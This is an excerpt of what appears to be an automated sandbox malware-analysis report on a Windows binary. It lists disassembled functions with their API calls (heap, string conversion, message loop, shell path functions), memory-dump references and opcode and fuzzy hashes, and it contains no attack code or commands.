                                                                                                                                                        • Opcode Fuzzy Hash: e0aba6f5deae09f213a23417450328de1459d45638e9d8c45afea71c4bc1a0b3
                                                                                                                                                        • Instruction Fuzzy Hash: 13112B76A00109AFCF05FBA1CE56DEEB7B9EF14311B544065F506AB2A2DB30AE14CB61
                                                                                                                                                        Function 00AB010A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AB45EC: __FF_MSGBANNER.LIBCMT ref: 00AB4603
                                                                                                                                                          • Part of subcall function 00AB45EC: __NMSG_WRITE.LIBCMT ref: 00AB460A
                                                                                                                                                          • Part of subcall function 00AB45EC: RtlAllocateHeap.NTDLL(00D90000,00000000,00000001), ref: 00AB462F
                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00AB013E
                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00AB0153
                                                                                                                                                          • Part of subcall function 00AB7495: RaiseException.KERNEL32(?,?,00A9125D,00B46598,?,?,?,00AB0158,00A9125D,00B46598,?,00000001), ref: 00AB74E6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                        • String ID: bad allocation
                                                                                                                                                        • API String ID: 3902256705-2104205924
                                                                                                                                                        • Opcode ID: 535a6567751d78808e3929fb3263edb4caf6b3b2ffd60278c8404e10cd347b2d
                                                                                                                                                        • Instruction ID: 81ab5d4c5f32a8f3e8106f86028af34872e81b4d649c45f0525a30782319111f
                                                                                                                                                        • Opcode Fuzzy Hash: 535a6567751d78808e3929fb3263edb4caf6b3b2ffd60278c8404e10cd347b2d
                                                                                                                                                        • Instruction Fuzzy Hash: E1F0C87510421DA6C719FBACED02EDF7BEC9F04350F504556F90596183DBB08A80A7A5
                                                                                                                                                        Function 00AEF79F Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 53cb7de3d3d89f3cc4e46414e21d605ad035caa77b45ca43a0b2959edb3c91bf
                                                                                                                                                        • Instruction ID: 8e3f0c71874f3350e180b189b696fb3e37ee64d7ee081cb2311a37e5bfa616d8
                                                                                                                                                        • Opcode Fuzzy Hash: 53cb7de3d3d89f3cc4e46414e21d605ad035caa77b45ca43a0b2959edb3c91bf
                                                                                                                                                        • Instruction Fuzzy Hash: 74F17B71A047419FCB10DF29C980B5AB7E5FF88314F10896EF9999B292DB31E945CF82
                                                                                                                                                        Function 00A9C610 Relevance: 4.6, APIs: 3, Instructions: 125COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00A9C00E,?,?,?,?,00000010), ref: 00A9C627
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 00A9C65F
                                                                                                                                                        • _memmove.LIBCMT ref: 00A9C697
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3033907384-0
                                                                                                                                                        • Opcode ID: a9195a9a481ba9e03cf2908a8bad66bfd8be5d11e002b5ba1997abd481008d03
                                                                                                                                                        • Instruction ID: 384b2ef630d76ac9748757a7b46733b6966f48569446cf824aedf25cea036f6e
                                                                                                                                                        • Opcode Fuzzy Hash: a9195a9a481ba9e03cf2908a8bad66bfd8be5d11e002b5ba1997abd481008d03
                                                                                                                                                        • Instruction Fuzzy Hash: AF3107B23016016BDB289B78DC46F6BB7D9EF44360F10553AF95ACB2D1EB32E9108751
                                                                                                                                                        Function 00A93A67 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SHGetMalloc.SHELL32(00A93C31), ref: 00A93A7D
                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00A93AD2
                                                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00A93A8F
                                                                                                                                                          • Part of subcall function 00A93B1E: _wcsncpy.LIBCMT ref: 00A93B32
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3981382179-0
                                                                                                                                                        • Opcode ID: d1b1ac36ab22ccbc9e8abc83987a7c1e8cb6bbe24c272062c2e48b8cd812cd9f
                                                                                                                                                        • Instruction ID: 8ec6f50b6d5c59241c16c326eb697d4876b1d60b80cd49966096329aa689499e
                                                                                                                                                        • Opcode Fuzzy Hash: d1b1ac36ab22ccbc9e8abc83987a7c1e8cb6bbe24c272062c2e48b8cd812cd9f
                                                                                                                                                        • Instruction Fuzzy Hash: 0F213D76B00114ABCF14DB95D884EEEB7BDEF88740B104094F609D7255DB309E46CB90
                                                                                                                                                        Function 00AB45EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00AB4603
                                                                                                                                                          • Part of subcall function 00AB8E52: __NMSG_WRITE.LIBCMT ref: 00AB8E79
                                                                                                                                                          • Part of subcall function 00AB8E52: __NMSG_WRITE.LIBCMT ref: 00AB8E83
                                                                                                                                                        • __NMSG_WRITE.LIBCMT ref: 00AB460A
                                                                                                                                                          • Part of subcall function 00AB8EB2: GetModuleFileNameW.KERNEL32(00000000,00B50312,00000104,?,00000001,00AB0127), ref: 00AB8F44
                                                                                                                                                          • Part of subcall function 00AB8EB2: ___crtMessageBoxW.LIBCMT ref: 00AB8FF2
                                                                                                                                                          • Part of subcall function 00AB1D65: ___crtCorExitProcess.LIBCMT ref: 00AB1D6B
                                                                                                                                                          • Part of subcall function 00AB1D65: ExitProcess.KERNEL32 ref: 00AB1D74
                                                                                                                                                          • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00D90000,00000000,00000001), ref: 00AB462F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1372826849-0
                                                                                                                                                        • Opcode ID: 0ea917289d62d12a5dabd20444b21f7651b0832ecf4f8a3b4db38a71f3ea9706
                                                                                                                                                        • Instruction ID: eac8716abf4d4309c6ab2df6e4b4260da168b9a757bc5cfd54fccd6b35f061fe
                                                                                                                                                        • Opcode Fuzzy Hash: 0ea917289d62d12a5dabd20444b21f7651b0832ecf4f8a3b4db38a71f3ea9706
                                                                                                                                                        • Instruction Fuzzy Hash: 6D01B531601302AAEA203B68AD62BEA735CAF86762F51012AF9059B1C7DFB4DC40C664
                                                                                                                                                        Function 00A9E60E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00A9E646
                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00A9E651
                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A9E664
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Message$DispatchPeekTranslate
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4217535847-0
                                                                                                                                                        • Opcode ID: 4868738ac50f634071ea9836054fb711308400e5d9b97fbb36ac9aa95e8ba8d6
                                                                                                                                                        • Instruction ID: f0978984631659c7ffa9af86b1f02d127647ecb35192b0a2114540138f327233
                                                                                                                                                        • Opcode Fuzzy Hash: 4868738ac50f634071ea9836054fb711308400e5d9b97fbb36ac9aa95e8ba8d6
                                                                                                                                                        • Instruction Fuzzy Hash: 23F0F8766443459BDF20DBE48D45BABB7DDAB94740F544C69B641C7081EBA4E4048B22
                                                                                                                                                        Function 00ADC450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _free.LIBCMT ref: 00ADC45E
                                                                                                                                                          • Part of subcall function 00AB28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00AB8715,00000000,00AB88A3,00AB4673,?), ref: 00AB28DE
                                                                                                                                                          • Part of subcall function 00AB28CA: GetLastError.KERNEL32(00000000,?,00AB8715,00000000,00AB88A3,00AB4673,?), ref: 00AB28F0
                                                                                                                                                        • _free.LIBCMT ref: 00ADC46F
                                                                                                                                                        • _free.LIBCMT ref: 00ADC481
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                        • Opcode ID: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                                                        • Instruction ID: 1e3ec1eb447f7d9e2f64743d1c2330abc64e157c7dc8ad4c9c6f2f4abcec38d6
                                                                                                                                                        • Opcode Fuzzy Hash: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                                                        • Instruction Fuzzy Hash: F8E017E260071296CA24AAB9A958BF363CC6F44761F54482FF45AD7283DF28E840C678
                                                                                                                                                        Function 00AA058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: CALL
                                                                                                                                                        • API String ID: 0-4196123274
                                                                                                                                                        • Opcode ID: 32faf43f3ef581d938988d3ab39948945828722c24e496d679b7128a300910da
                                                                                                                                                        • Instruction ID: f45cb160ad75b0470484533f115eb94d6c57d76e5accf371a05d06c337da0a07
                                                                                                                                                        • Opcode Fuzzy Hash: 32faf43f3ef581d938988d3ab39948945828722c24e496d679b7128a300910da
                                                                                                                                                        • Instruction Fuzzy Hash: E2224C70608341DFDB28DF24C590E6ABBF1FF89304F15895DE89A8B2A2D775E845CB42
                                                                                                                                                        Function 00A9131C Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A916F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00A91751
                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A9159B
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00A91612
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B058F7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 458326420-0
                                                                                                                                                        • Opcode ID: a4701b3f6fdddda324ea7e2f6385ac330feb699b0138dfe572c7040dc3a9c6aa
                                                                                                                                                        • Instruction ID: e7362d1b0e038d7db0961996ed644dd4fc861b6bc50d30d515befc1f96505c7b
                                                                                                                                                        • Opcode Fuzzy Hash: a4701b3f6fdddda324ea7e2f6385ac330feb699b0138dfe572c7040dc3a9c6aa
                                                                                                                                                        • Instruction Fuzzy Hash: 4971BBB59013419BC700EF6EB9A0794BBE4FB5834A794AEEED00A97362DFB04844CF15
                                                                                                                                                        Function 00A94010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID: EA06
                                                                                                                                                        • API String ID: 4104443479-3962188686
                                                                                                                                                        • Opcode ID: 44d320149d0307294f6af2e6fd04a246dbf1b3ed233a86c029fc69d5bd14f6f8
                                                                                                                                                        • Instruction ID: 8d93ff4b8395c7c38853f50952298fa64ba59129ab21ebffbde3bf1b067127a0
                                                                                                                                                        • Opcode Fuzzy Hash: 44d320149d0307294f6af2e6fd04a246dbf1b3ed233a86c029fc69d5bd14f6f8
                                                                                                                                                        • Instruction Fuzzy Hash: 65418C31B081549BDF159B6489A1FBF7FF1DB1D300F384665EA829B283C6258D8287A1
                                                                                                                                                        Function 00AE013F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
